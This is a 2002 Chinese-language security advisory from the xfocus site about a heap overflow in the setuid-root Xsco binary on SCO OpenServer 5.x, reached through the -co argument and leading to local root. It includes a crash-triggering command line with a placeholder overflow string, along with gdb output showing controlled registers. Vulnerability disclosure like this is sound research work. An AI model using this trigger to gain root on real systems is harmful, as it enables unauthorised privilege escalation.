xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

SCO OpenServer Xsco存在堆缓冲溢出


发布时间:2002-06-13
更新时间:2002-06-13
严重程度:
威胁程度:本地管理员权限
错误类型:边界检查错误
利用方式:服务器模式

受影响系统
SCO/Caldera OpenServer 5.x
详细描述
SCO OpenServer Xsco应用程序默认以setuid root权限安装,其中提交给-co参数的数据缺少正确的检查,可导致堆溢出,使的写任意内存地址而以ROOT权限执行任意命令。

测试代码
bash-2.03$ ./Xsco :1 -co <b0f here> -crt /dev/console


Tue Jun 11 10:32:59 2002
Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
Segmentation Fault


0x8164073 in _grantpt ()
(gdb) bt
#0 0x8164073 in _grantpt ()
#1 0x8164532 in malloc ()
#2 0x80027103 in _s_a_get ()
#3 0x81594bc in _ptsname ()
#4 0x8087526 in wctype ()
#5 0x8085e95 in wctype ()
#6 0x80745f4 in wctype ()
#7 0x804d69b in wctype ()


(gdb) i r
eax 0x41414141 1094795585
ecx 0x495b38d4 1230715092
edx 0x0 0
ebx 0x18 24
esp 0x8045814 0x8045814
ebp 0x8045834 0x8045834
esi 0x41414140 1094795584
edi 0x819f794 135919508
eip 0x8164073 0x8164073

解决方案
尚无

相关信息
KF (dotslash@snosoft.com)
参考:http://archives.neohapsis.com/archives/bugtraq/2002-06/0081.html
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved